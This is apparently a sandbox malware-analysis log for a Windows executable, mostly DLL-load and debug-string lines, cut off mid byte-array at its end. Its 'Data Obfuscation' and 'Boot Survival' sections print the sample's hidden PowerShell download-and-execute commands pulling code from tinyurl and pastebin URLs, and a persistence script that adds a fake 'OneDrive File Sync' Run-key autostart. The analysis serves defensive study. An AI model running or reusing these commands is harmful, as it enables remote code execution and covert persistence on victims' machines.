Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
Source: BeginSync.lnk.3.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\vF20HtY4a4.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: vF20HtY4a4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vF20HtY4a4.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: vF20HtY4a4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: vF20HtY4a4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAC source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000009.00000002.2014277292.000001FD294F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2118591643.00000210EA688000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbr source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbI source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbW source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbdatetime source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb#D source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD297DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2117616989.00000210EA5FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscoree.dllKC:/Users/GLaDOS/The/Cake/Is/A/Lie.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbe089R source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 0000000E.00000002.2119928343.00000210EA911000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32\Win Jh source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdba source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdbSHA256 source: vF20HtY4a4.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbm source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: vF20HtY4a4.exeStatic PE information: 0xDE7ACC38 [Mon Apr 12 06:27:04 2088 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE2E1CA push edx; iretd 9_2_00007FFB4AE2E1CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE32558 push E8FFFFFFh; iretd 9_2_00007FFB4AE3255D

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0